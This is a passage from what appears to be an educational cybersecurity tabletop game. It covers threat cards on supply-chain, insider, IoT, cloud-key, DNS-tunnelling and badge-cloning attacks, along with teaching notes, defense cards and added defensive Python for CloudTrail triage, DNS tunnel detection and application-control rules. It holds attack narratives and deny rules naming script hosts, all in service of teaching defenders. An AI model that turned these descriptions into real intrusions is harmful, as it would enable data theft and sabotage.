│ to trusted vendor origin. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ MALICIOUS THIRD-PARTY LIBRARY │
│ INJECTION │
├─────────────────────────────────────┤
│ Step: INITIAL COMPROMISE │
│ Vector: MALWARE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your dependency scanning tool │
│ alerts on a typosquatted npm │
│ package that was installed in your │
│ build pipeline. The malicious │
│ package has the same name as a │
│ popular logging library but with a │
│ slight misspelling. │
│ It has been downloaded 50k times. │
│ Your build logs show it was │
│ installed 6 days ago." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Developers rely on open-source │
│ packages from package managers │
│ (npm, PyPI, Maven). Attackers │
│ upload malicious packages with │
│ names similar to popular libraries │
│ (typosquatting). Once downloaded, │
│ the malicious code runs during │
│ build/deployment. This affects │
│ every application built from that │
│ point forward. │
│ │
│ DETECTION DIFFICULTY: High │
│ Requires dependency scanning and │
│ behavior analysis of build processes.│
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ MALICIOUS INSIDER DATA THEFT │
├─────────────────────────────────────┤
│ Step: C2 & EXFIL │
│ Vector: DATA EXFIL │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your DLP system flags a large │
│ volume of sensitive data being │
│ copied by an IT operations │
│ employee during off-hours. Their │
│ user account accessed databases │
│ they don't normally interact with. │
│ The data was copied to a removable │
│ USB drive connected to a shared │
│ workstation. Security badge logs │
│ show they entered the building at │
│ 2 AM when the office was empty." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Insiders have legitimate access and │
│ often bypass security controls. │
│ Their activities may not trigger │
│ alerts because their permissions │
│ are valid. Detection requires: │
│ - Behavioral analysis (unusual │
│ times/volumes) │
│ - Physical security controls │
│ - DLP and USB device control │
│ - Privileged access management │
│ Insiders cause 30-40% of data │
│ breaches in many industries. │
│ │
│ DETECTION DIFFICULTY: Very High │
│ Insider actions often look normal │
│ to automated systems. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ DISGRUNTLED EMPLOYEE SABOTAGE │
├─────────────────────────────────────┤
│ Step: PIVOT & ESCALATE │
│ Vector: MALWARE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "A recently terminated database │
│ administrator appears to have │
│ retained remote access using a │
│ dormant service account they │
│ created months ago. Logs show │
│ connection attempts from their │
│ home IP address. They've been │
│ modifying stored procedures and │
│ adding logic bombs set to trigger │
│ in 30 days. Your team notices │
│ their employee laptop is still │
│ configured with VPN certificates." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Disgruntled employees often have │
│ privileged access and deep system │
│ knowledge. They may have created │
│ backdoors before termination. │
│ Offboarding failures (not revoking │
│ certs, not disabling accounts) are │
│ common. Defense requires: │
│ - Complete offboarding procedures │
│ - Privileged access review │
│ - Anomalous activity detection │
│ - Behavior analysis for terminated │
│ employees │
│ │
│ DETECTION DIFFICULTY: High │
│ Requires correlation of access │
│ patterns and employee status changes.│
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ COMPROMISED IOT DEVICE AS PIVOT │
│ POINT │
├─────────────────────────────────────┤
│ Step: INITIAL COMPROMISE │
│ Vector: NETWORK │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your network monitoring detects │
│ unusual traffic from an IoT device │
│ (surveillance camera) in the │
│ building. The device is communicating│
│ with a command server overseas and │
│ tunneling internal network traffic. │
│ Your asset inventory shows this │
│ camera was never formally added to │
│ any security program. It's running │
│ firmware from 2019 with known │
│ vulnerabilities." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ IoT devices are often neglected in │
│ security programs (cameras, printers,│
│ thermostats, building automation). │
│ They run outdated firmware and have │
│ weak or default credentials. Once │
│ compromised, they provide network │
│ access and can pivot to critical │
│ systems. Many organizations don't │
│ inventory or monitor IoT devices. │
│ │
│ DETECTION DIFFICULTY: Medium │
│ Requires network monitoring and │
│ device inventory practices. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ CLOUD API TOKEN THEFT & ABUSE │
├─────────────────────────────────────┤
│ Step: PIVOT & ESCALATE │
│ Vector: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your AWS CloudTrail logs show API │
│ calls from unusual IP addresses │
│ using API keys belonging to a │
│ developer who left the company 6 │
│ months ago. The calls are creating │
│ new IAM users, accessing S3 buckets │
│ with customer data, and launching │
│ EC2 instances in regions where you │
│ don't normally operate. The API key │
│ was embedded in old GitHub │
│ repository code." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Cloud API tokens/keys are often │
│ exposed in code repositories or │
│ configuration files. Once exposed, │
│ they provide direct access to cloud │
│ resources. Attackers can spin up │
│ resources, steal data, or deploy │
│ cryptominers. Many organizations │
│ fail to rotate or revoke old API │
│ keys. Detection requires: │
│ - API audit logging │
│ - Anomalous API pattern detection │
│ - Key rotation policies │
│ - Secrets scanning in repos │
│ │
│ DETECTION DIFFICULTY: Medium-High │
│ Requires cloud monitoring and │
│ secrets management practices. │
└─────────────────────────────────────┘
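The triage the clue describes, as an added example that is not part of the RetroVerse materials: a Python pass over CloudTrail-shaped records that flags use of a departed user's key, activity in regions you never operate in, IAM calls that create or widen access, and calls from outside corporate ranges. The HR list, the approved regions, the 203.0.113.0/24 corporate range and every event are constructed for the example; the key IDs are AWS's documentation placeholders, and the service-principal record shows why a detector must not treat every `sourceIPAddress` as an IP.

```python
import ipaddress
from collections import Counter

# Context an analyst pulls from HR and the cloud team (all constructed):
DEPARTED_USERS = {"jdoe"}                      # left six months ago; key never revoked
APPROVED_REGIONS = {"us-east-1", "us-west-2"}
CORPORATE_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]  # RFC 5737 documentation range
# IAM calls that create or widen access: the persistence moves in the clue.
PERSISTENCE_ACTIONS = {
    "CreateUser", "CreateAccessKey", "CreateLoginProfile",
    "AttachUserPolicy", "PutUserPolicy", "UpdateAssumeRolePolicy",
}


def _user_event(name, key, action, region, ip, when):
    """Minimal CloudTrail-shaped record for an IAM user (constructed sample)."""
    return {"eventTime": when, "eventName": action, "awsRegion": region, "sourceIPAddress": ip,
            "userIdentity": {"type": "IAMUser", "userName": name, "accessKeyId": key}}


SAMPLE_EVENTS = [
    _user_event("jdoe", "AKIAIOSFODNN7EXAMPLE", "ListBuckets", "us-east-1", "198.51.100.23", "2024-03-01T02:14:00Z"),
    _user_event("jdoe", "AKIAIOSFODNN7EXAMPLE", "CreateUser", "us-east-1", "198.51.100.23", "2024-03-01T02:15:10Z"),
    _user_event("jdoe", "AKIAIOSFODNN7EXAMPLE", "RunInstances", "ap-southeast-1", "198.51.100.23", "2024-03-01T02:16:40Z"),
    _user_event("jdoe", "AKIAIOSFODNN7EXAMPLE", "GetObject", "us-east-1", "198.51.100.23", "2024-03-01T02:18:05Z"),
    _user_event("asmith", "AKIAI44QH8DHBEXAMPLE", "DescribeInstances", "us-west-2", "203.0.113.5", "2024-03-01T09:02:00Z"),
    _user_event("asmith", "AKIAI44QH8DHBEXAMPLE", "RunInstances", "us-east-1", "203.0.113.9", "2024-03-01T09:05:00Z"),
    {   # a role assumed by an AWS service: no userName, and the source is a service name
        "eventTime": "2024-03-01T09:10:00Z", "eventName": "PutObject", "awsRegion": "us-east-1",
        "sourceIPAddress": "cloudformation.amazonaws.com",
        "userIdentity": {"type": "AssumedRole", "accessKeyId": "ASIAEXAMPLESESSION",
                         "arn": "arn:aws:sts::123456789012:assumed-role/DeployRole/stack-deploy"},
    },
]


def principal_name(identity):
    """IAM users carry userName; assumed-role records only carry the STS ARN."""
    if identity.get("userName"):
        return identity["userName"]
    parts = identity.get("arn", "").split("/")   # .../assumed-role/<Role>/<session>
    return parts[1] if len(parts) >= 2 else "unknown"


def is_external(source):
    """True for a routable address outside corporate ranges. AWS service
    principals appear as names like 'cloudformation.amazonaws.com' and are
    never 'external'."""
    try:
        addr = ipaddress.ip_address(source)
    except ValueError:
        return False
    return not any(addr in net for net in CORPORATE_NETWORKS)


def triage(events):
    findings = []
    for ev in events:
        ident = ev["userIdentity"]
        who, key = principal_name(ident), ident.get("accessKeyId", "")
        hits = []
        if who in DEPARTED_USERS:
            hits.append("departed_user_key")
        if ev["awsRegion"] not in APPROVED_REGIONS:
            hits.append("unusual_region")
        if ev["eventName"] in PERSISTENCE_ACTIONS:
            hits.append("iam_persistence")
        if is_external(ev["sourceIPAddress"]):
            hits.append("external_source_ip")
        for rule in hits:
            findings.append({"rule": rule, "user": who, "key": key, "event": ev["eventName"],
                             "region": ev["awsRegion"], "ip": ev["sourceIPAddress"], "time": ev["eventTime"]})
    return findings


def summarize(findings):
    """Rule counts per principal. One departed user's key tripping several
    rules at once is the cue to revoke the key first and investigate after."""
    per_user = {}
    for f in findings:
        per_user.setdefault(f["user"], Counter())[f["rule"]] += 1
    return per_user


if __name__ == "__main__":
    for user, rules in summarize(triage(SAMPLE_EVENTS)).items():
        print(user, dict(rules))
```

The departed-user rule alone would have caught this key on its first call, which is the point of feeding an HR leaver list into cloud monitoring; the other three rules are what you rely on when the stolen key belongs to someone still employed.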
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ DNS TUNNELING DATA EXFILTRATION │
├─────────────────────────────────────┤
│ Step: C2 & EXFIL │
│ Vector: DATA EXFIL │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your DNS query logs show massive │
│ volume of unusual subdomains being │
│ queried through an external DNS │
│ resolver. The subdomain names look │
│ like encoded data (hex or Base32; │
│ DNS names are case-insensitive, so │
│ tunnels avoid plain Base64). Queries│
│ are happening in steady intervals. │
│ Query timestamps align with your │
│ database being accessed. Your DLP │
│ didn't flag anything because DNS is │
│ typically trusted." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ DNS tunneling encodes data in DNS │
│ queries to bypass firewalls and DLP │
│ systems. Organizations often allow │
│ DNS traffic without inspection. DNS │
│ queries are typically high-volume │
│ and hard to distinguish from normal │
│ activity. Attackers can exfil small │
│ amounts of data over weeks. │
│ Defense requires: │
│ - DNS query content analysis │
│ - Anomalous query pattern detection │
│ - DNS rate limiting │
│ - External DNS access restrictions │
│ │
│ DETECTION DIFFICULTY: Very High │
│ Requires specialized DNS monitoring │
│ tools and baseline analysis. │
└─────────────────────────────────────┘
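The "DNS query content analysis" and "anomalous query pattern detection" the card calls for, as an added example that is not part of the RetroVerse materials: a Python pass over resolver logs that scores each registered domain on the traits a tunnel cannot hide (almost every name is new, the leftmost label is long and high-entropy, queries arrive on a fixed cadence). The log format, the `t-example.net` zone, the 30-second beacon and the thresholds are constructed for the example; tune the thresholds against your own baseline before alerting on them.

```python
import math
import random
import statistics
from collections import defaultdict
from datetime import datetime, timedelta


def shannon_entropy(text: str) -> float:
    """Bits per character: random hex approaches 4.0, dictionary words sit near 2-3."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def zone_of(qname: str) -> str:
    # Approximation: registered domain = last two labels. Production code should
    # consult the Public Suffix List so that names under co.uk and friends group correctly.
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def parse_line(line: str):
    ts, client, qname, qtype = line.split()
    return datetime.fromisoformat(ts), client, qname.lower(), qtype


def build_sample_log():
    """Constructed resolver log: 30 ordinary lookups plus a 40-query tunnel."""
    rng = random.Random(7)
    base = datetime(2024, 3, 1, 2, 0, 0)
    normal = ["www.example.com", "mail.example.com", "cdn.example.com", "api.partner.org"]
    lines = []
    for _ in range(30):
        t = base + timedelta(seconds=rng.randint(0, 3600))
        lines.append(f"{t.isoformat()} 10.0.5.17 {rng.choice(normal)} A")
    for i in range(40):  # one 32-hex-char chunk every 30 s, never repeated
        t = base + timedelta(seconds=30 * i)
        label = "".join(rng.choice("0123456789abcdef") for _ in range(32))
        lines.append(f"{t.isoformat()} 10.0.5.17 {label}.upd.t-example.net TXT")
    return sorted(lines)


def analyze(lines, min_queries=20):
    """Per-zone features; a zone is suspicious only when it shows every tunnel trait."""
    per_zone = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        per_zone[zone_of(ev[2])].append(ev)

    findings = {}
    for zone, events in per_zone.items():
        events.sort()
        names = [ev[2] for ev in events]
        first_labels = [name.split(".")[0] for name in names]
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        mean_gap = statistics.mean(gaps) if gaps else 0.0
        feats = {
            "queries": len(events),
            "unique_ratio": len(set(names)) / len(names),
            "avg_label_len": statistics.mean(len(lbl) for lbl in first_labels),
            "avg_entropy": statistics.mean(shannon_entropy(lbl) for lbl in first_labels),
            "txt_ratio": sum(ev[3] == "TXT" for ev in events) / len(events),
            # coefficient of variation of inter-query gaps: near 0 means a fixed beacon interval
            "gap_cv": (statistics.pstdev(gaps) / mean_gap) if mean_gap > 0 else None,
        }
        feats["suspicious"] = (
            feats["queries"] >= min_queries
            and feats["unique_ratio"] >= 0.8     # nearly every name is new: payload, not cache misses
            and feats["avg_label_len"] >= 20     # the leftmost label is carrying data
            and feats["avg_entropy"] >= 3.0      # encoded bytes, not words
        )
        findings[zone] = feats
    return findings


def tunnel_suspects(lines):
    return sorted(zone for zone, f in analyze(lines).items() if f["suspicious"])


if __name__ == "__main__":
    for zone, feats in analyze(build_sample_log()).items():
        print(zone, feats)
```

The unique-name ratio is the feature that separates a tunnel from a busy CDN: a CDN answers the same few names thousands of times, a tunnel never repeats one. A real deployment also restricts which hosts may reach external resolvers at all, which removes the "external DNS resolver" path in the clue.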
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ PHYSICAL ACCESS + BADGE CLONING │
│ ATTACK │
├─────────────────────────────────────┤
│ Step: INITIAL COMPROMISE │
│ Vector: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your security team discovers that │
│ an RFID badge belonging to a │
│ manager was cloned using a portable │
│ reader. The cloned badge was used │
│ to gain access to your secure data │
│ center after-hours. Badge access │
│ logs are timestamped, but the │
│ person's schedule shows they weren't│
│ in the office that evening. Your │
│ server room CCTV captured footage │
│ of an unknown individual installing │
│ a wireless device in the network │
│ rack." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Physical security is often │
│ overlooked in cybersecurity │
│ programs. RFID badges can be cloned │
│ with inexpensive readers. Once │
│ inside the data center, attackers │
│ can install rogue network devices, │
│ steal hardware, or gain console │
│ access to servers. Defense requires:│
│ - Encrypted badge technology │
│ - Multi-factor access (biometric) │
│ - CCTV monitoring │
│ - Environmental controls │
│ - Equipment inventory tracking │
│ - Badge deactivation on exit │
│ │
│ DETECTION DIFFICULTY: High │
│ Requires integration of physical │
│ and cyber security monitoring. │
└─────────────────────────────────────┘
Teaches: Third-party risk management, vendor security assessment, incident response at scale
1. Compromised Software Vendor Update (Initial Compromise) → MALWARE
2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK
3. Scheduled Task Persistence (Persistence) → MALWARE
4. Beaconing to C2 Server (C2 & Exfil) → NETWORK
5. SQL Database Exfiltration (C2 & Exfil) → DATA EXFIL

Special Rule: Reveal this threat to 3+ teams (representing industry-wide detection). First team to detect gains +20 Budget (represents vendor advisory advantage).

Teaches: Insider risk detection, privileged access management, offboarding procedures
1. Disgruntled Employee Sabotage (Pivot & Escalate) → MALWARE
2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK
3. Mimikatz Credential Dumping (Pivot & Escalate) → CREDENTIAL ABUSE
4. Malicious Insider Data Theft (C2 & Exfil) → DATA EXFIL

Special Rule: The employee's offboarding checklist is partially incomplete. Teams get a -2 penalty to detect the first insider threat (represents delayed detection in real situations).

Teaches: IoT security, cloud security, API management, defense breadth
1. Compromised IoT Device as Pivot Point (Initial Compromise) → NETWORK
2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK
3. Cloud API Token Theft & Abuse (Pivot & Escalate) → CREDENTIAL ABUSE
4. DNS Tunneling Data Exfiltration (C2 & Exfil) → DATA EXFIL

Parallel threat: Teams must defend both cloud and on-premises infrastructure simultaneously.

Teaches: Physical security integration, environmental controls, holistic security
1. Physical Access + Badge Cloning (Initial Compromise) → CREDENTIAL ABUSE
2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK
3. Scheduled Task Persistence (Persistence) → MALWARE
4. Ransomware Payload Deployment (C2 & Exfil) → MALWARE

Special Rule: The first defense deployed must address the physical security aspect (badge systems, CCTV review, environmental controls). Teams get a narrative bonus: "Your physical security team noticed the intruder before full compromise."

Teaches: Complex attack coordination, detecting collusion, multi-vector threats
1. Malicious Third-Party Library Injection (Initial Compromise) → MALWARE
2. Disgruntled Employee Sabotage (Pivot & Escalate) → MALWARE
3. Cloud API Token Theft & Abuse (Pivot & Escalate) → CREDENTIAL ABUSE
4. DNS Tunneling Data Exfiltration (C2 & Exfil) → DATA EXFIL
5. Malicious Insider Data Theft (C2 & Exfil) → DATA EXFIL

Special Rule: Two threats must be revealed to understand the full scope (supply chain + insider collaboration). An incomplete investigation misses the insider component.
(v2.2) Entries now cite real card IDs from the core deck (D-01 to D-24) and expansion deck (D-25 to D-43, see advanced-defenses.md). Concepts without a printed card are marked (custom — not in deck) and make good custom-card projects.
Real-world context:
- SolarWinds (2020): ~18,000 customers installed the trojanized Orion update; a far smaller set was actively targeted afterwards
- 3CX (2023): trojanized desktop-app installer, itself traced to an earlier supply chain compromise at an upstream vendor
- XcodeGhost (2015): a tampered copy of the Xcode developer tool injected code into otherwise legitimate iOS apps
- Typosquatted and malicious packages discovered monthly on npm/PyPI

Discussion points after reveal:
- "How do you verify software authenticity?"
- "What's the difference between detecting supply chain compromises vs. traditional malware?"
- "Why is this harder to detect than direct attacks?"

Real-world context:
- Internal actors appear in roughly 20-35% of breaches in recent Verizon DBIR editions, most of them through error rather than malice
- Manning, Snowden, Reality Winner cases (government sector)
- Thousands of employee theft cases in financial/tech industries

Discussion points after reveal:
- "How would you detect insider threat indicators before damage occurs?"
- "Why is offboarding security often weak?"
- "What's the difference between a malicious insider and a negligent employee?"

Real-world context:
- Mirai botnet (2016): hundreds of thousands of IoT devices (peak estimates around 600,000) taken over with factory-default credentials and used for record-setting DDoS attacks
- Connected cameras, printers, thermostats often neglected
- "Shadow IT" problem in many organizations

Discussion points after reveal:
- "Should IoT devices be on the same network as critical systems?"
- "How do you patch thousands of IoT devices?"
- "Why are credentials often factory-default on IoT?"

Real-world context:
- Cloud credentials are pushed to public GitHub repositories every day; an academic scan (Meli et al., NDSS 2019) found thousands of new secrets leaking daily
- Tesla (2018): an unauthenticated Kubernetes dashboard exposed AWS credentials, which were used for cryptomining
- Capital One (2019): SSRF against a misconfigured WAF instance yielded temporary credentials for an over-privileged IAM role with access to S3

Discussion points after reveal:
- "How do you manage API keys for thousands of developers?"
- "Why is secrets rotation hard in practice?"
- "How would you know if someone used your AWS API key?"

Real-world context:
- Used by the DNSExfiltrator tool and by malware attributed to OilRig and Turla
- Hard to detect because DNS is typically trusted
- Throughput is low (tens of KB per hour at stealthy query rates), so attackers exfil small amounts over weeks

Discussion points after reveal:
- "Why is DNS hard to monitor?"
- "What would a normal DNS query pattern look like?"
- "How would you distinguish data exfil from normal DNS activity?"

Real-world context:
- RFID cloning demonstrated on hotel keys and on low-frequency (125 kHz) building badges
- Rogue network devices ("drop boxes") found in offices and data centers during real incidents and red-team engagements
- USB drops with malware remain effective attack vectors

Discussion points after reveal:
- "Should cybersecurity teams care about physical security?"
- "How do you audit data center access?"
- "What's harder to defend: cyber or physical attacks?"
| Card | Title | Step | Vector | Difficulty |
|---|---|---|---|---|
| T-13 | Compromised Software Vendor Update | INITIAL | MALWARE | Hard |
| T-14 | Malicious Third-Party Library Injection | INITIAL | MALWARE | Medium |
| T-15 | Malicious Insider Data Theft | C2 & EXFIL | DATA EXFIL | Very Hard |
| T-16 | Disgruntled Employee Sabotage | PIVOT & ESCALATE | MALWARE | Hard |
| T-17 | Compromised IoT Device as Pivot Point | INITIAL | NETWORK | Medium |
| T-18 | Cloud API Token Theft & Abuse | PIVOT & ESCALATE | CREDENTIAL ABUSE | Hard |
| T-19 | DNS Tunneling Data Exfiltration | C2 & EXFIL | DATA EXFIL | Very Hard |
| T-20 | Physical Access + Badge Cloning | INITIAL | CREDENTIAL ABUSE | Hard |
Expansion Threat Card Set for Incident Zero
Use these cards to add modern threat scenarios to your game
For discussion and teaching notes, see above sections
cards/incident-response/expansion-deck/advanced-defenses.md
This document provides additional Defense Cards for expanding Incident Zero gameplay beyond the base 24-card deck. These cards introduce modern security architectures and advanced defensive capabilities that complement the base game.
Note (v2.2): These expansion defenses were renumbered from D-19–D-37 to D-25–D-43 to avoid colliding with core deck cards D-19–D-24 (see ../core-deck/threat-defense-cards.md).
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ APPLICATION WHITELISTING │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy application whitelisting on │
│ critical workstations and servers. │
│ Maintain an approved-applications │
│ list (Office, browser, LOB apps) │
│ expressed as path, publisher or │
│ hash rules; block anything else. │
│ Use AppLocker or Windows Defender │
│ Application Control on Windows. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Prevents execution of unapproved │
│ binaries, including malware that no │
│ signature knows yet: ransomware, │
│ backdoors and dropped pentest tools │
│ fail to launch unless they match an │
│ allow rule. │
│ │
│ LIMITATION: Allow rules are additive│
│ (any match permits), so signed │
│ built-in tools such as PowerShell │
│ stay runnable; see LIVING-OFF-THE- │
│ LAND BLOCKER. A poorly maintained │
│ list blocks legitimate updates and │
│ tools, and users push back. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ ADVANCED APPLICATION CONTROL WITH AI│
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy AI-powered application │
│ control that learns normal program │
│ execution patterns. System builds a │
│ baseline of legitimate applications │
│ and automatically flags deviations. │
│ Prevents execution of suspicious │
│ or anomalous applications. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Combines whitelisting with behavior │
│ analysis. Adapts to legitimate new │
│ applications without manual updates.│
│ Complements path and name rules, │
│ which a renamed binary dropped into │
│ an allowed folder can slip past, by │
│ judging what a program does rather │
│ than where it sits. Reduces false │
│ positives. │
│ │
│ LEARNING CURVE: Requires baseline │
│ training period (1-2 weeks). │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ LIVING-OFF-THE-LAND BLOCKER │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy advanced script and tool │
│ control that restricts execution of │
│ PowerShell, WScript, cmd.exe, and │
│ other "living-off-the-land" tools. │
│ Allow only named admin groups, with │
│ script block logging and Constrained│
│ Language Mode for everyone else. │
│ Monitor for obfuscation patterns. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Directly targets attacker techniques│
│ used in privilege escalation and │
│ lateral movement (scheduled tasks, │
│ registry modification, credential │
│ dumping). Makes PowerShell and cmd │
│ attacks extremely difficult. │
│ Works especially well with EDR. │
│ │
│ IMPACT: May break legitimate admin │
│ tasks; requires strong change │
│ management. │
└─────────────────────────────────────┘
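How the two cards above interact, as an added example that is not part of the RetroVerse materials: a Python model of AppLocker-style evaluation (explicit deny wins, then any matching allow, otherwise default deny) applied to a D-25 rule set and then to the same set with D-27's script-host denies. The rules, binaries, hashes and group names are constructed for the example; the publisher string is the shape of a Microsoft Authenticode subject, used here as an assumption rather than a verified value.

```python
from dataclasses import dataclass
from fnmatch import fnmatch
from typing import FrozenSet, Optional

MS_PUBLISHER = "O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US"   # assumed signer subject


@dataclass(frozen=True)
class Binary:
    path: str
    publisher: Optional[str]   # Authenticode signer subject, None if unsigned
    sha256: str


@dataclass(frozen=True)
class Rule:
    action: str                # "allow" or "deny"
    kind: str                  # "path", "publisher" or "hash"
    value: str
    groups: FrozenSet[str] = frozenset({"Everyone"})   # who the rule applies to


def matches(rule: Rule, binary: Binary, user_groups) -> bool:
    if not (rule.groups & user_groups):
        return False
    if rule.kind == "path":
        return fnmatch(binary.path.lower(), rule.value.lower())
    if rule.kind == "publisher":
        return binary.publisher == rule.value
    if rule.kind == "hash":
        return binary.sha256.lower() == rule.value.lower()
    raise ValueError(f"unknown rule kind {rule.kind}")


def decide(rules, binary, user_groups=frozenset({"Everyone", "Users"})):
    """Explicit deny beats any allow; several allows may match; nothing matching is blocked."""
    hits = [r for r in rules if matches(r, binary, user_groups)]
    if any(r.action == "deny" for r in hits):
        return "denied by rule"
    kinds = sorted({r.kind for r in hits if r.action == "allow"})
    if kinds:
        return "allowed by " + ", ".join(kinds)
    return "blocked (default deny)"


# D-25: the usual starting set. Standard users cannot write to these paths,
# so anything they download lands in a profile folder and falls to default deny.
D25_RULES = [
    Rule("allow", "path", r"C:\Program Files\*"),
    Rule("allow", "path", r"C:\Program Files (x86)\*"),
    Rule("allow", "path", r"C:\Windows\*"),
    Rule("allow", "publisher", MS_PUBLISHER),
    Rule("allow", "hash", "ee" * 32),        # one approved unsigned internal tool (constructed hash)
]
# D-27 on top: script hosts are denied for standard users, still allowed for admins.
D27_RULES = D25_RULES + [
    Rule("deny", "path", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", frozenset({"Users"})),
    Rule("deny", "path", r"C:\Windows\System32\cmd.exe", frozenset({"Users"})),
    Rule("deny", "path", r"C:\Windows\System32\wscript.exe", frozenset({"Users"})),
]

CASES = {   # constructed binaries
    "trusted_app": Binary(r"C:\Program Files\Vendor\app.exe", None, "aa" * 32),
    "internal_tool": Binary(r"C:\Tools\inventory.exe", None, "ee" * 32),
    "dropped_ransomware": Binary(r"C:\Users\bob\AppData\Local\Temp\invoice.exe", None, "bb" * 32),
    "dropped_signed_tool": Binary(r"C:\Users\bob\AppData\Local\Temp\PsExec.exe", MS_PUBLISHER, "cc" * 32),
    "powershell": Binary(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", MS_PUBLISHER, "dd" * 32),
}

if __name__ == "__main__":
    for name, binary in CASES.items():
        print(f"{name:22} D-25: {decide(D25_RULES, binary):28} D-27: {decide(D27_RULES, binary)}")
```

Two results are the lesson. The ransomware dropped into Temp is blocked by default deny without anyone having seen it before, which is why the card rates whitelisting against unknown malware. The Microsoft-signed PsExec dropped into the same folder is allowed by the publisher rule under both rule sets, and PowerShell is allowed under D-25 alone: any allow is enough, so living-off-the-land tools need their own deny rules (D-27) or a per-group policy rather than a broader allow list.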
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ BASELINE BEHAVIOR LEARNING SYSTEM │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy behavioral analytics that │
│ establishes baseline profiles for │
│ users, systems, and network traffic.│
│ System learns what "normal" looks │
│ like, then alerts on deviations. │
│ Monitors: login times, file access, │
│ network destinations, resource usage.│
├─────────────────────────────────────┤
│ EFFECT: │
│ Detects anomalies like: │
│ - Unusual login geography/time │
│ - Data access patterns changing │
│ - Lateral movement via SMB │
│ - New network destinations │
│ Works best as a *combination* with │
│ other tools. Requires good baseline │
│ data (1-2 weeks of normal traffic). │
│ │
│ DETECTS: Insider threats, │
│ compromised credentials, APT tactics.│
└─────────────────────────────────────┘
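The baseline-then-deviation logic this card and the MALICIOUS INSIDER DATA THEFT threat card both describe, as an added example that is not part of the RetroVerse materials: a Python model that learns one account's usual hours, databases and daily read volume from four weeks of history, then scores new events on three indicators and alerts only when two or more coincide. The account, the database names, the history generator and the thresholds are constructed for the example; a real system would aggregate the current day before comparing volume rather than scoring one event against a daily mean.

```python
import random
import statistics
from collections import Counter, defaultdict
from datetime import datetime, timedelta


class UserBaseline:
    """What 'normal' looks like for one account, learned from history."""

    def __init__(self):
        self.hour_counts = Counter()          # how often each clock hour appears
        self.resources = set()                # databases the user has touched
        self.daily_bytes = defaultdict(int)   # date -> bytes read that day
        self.mean_bytes = 0.0
        self.std_bytes = 1.0

    def observe(self, ev):
        self.hour_counts[ev["time"].hour] += 1
        self.resources.add(ev["resource"])
        self.daily_bytes[ev["time"].date()] += ev["bytes"]

    def finalize(self):
        totals = list(self.daily_bytes.values())
        self.mean_bytes = statistics.mean(totals)
        self.std_bytes = statistics.pstdev(totals) or 1.0   # guard against a perfectly flat history


def build_baselines(history):
    baselines = defaultdict(UserBaseline)
    for ev in history:
        baselines[ev["user"]].observe(ev)
    for b in baselines.values():
        b.finalize()
    return dict(baselines)


def score(ev, baseline, min_hour_count=3, z_threshold=3.0):
    indicators = []
    if baseline.hour_counts[ev["time"].hour] < min_hour_count:
        indicators.append("off_hours")
    if ev["resource"] not in baseline.resources:
        indicators.append("new_resource")
    # Simplification: one event's volume against the usual daily total.
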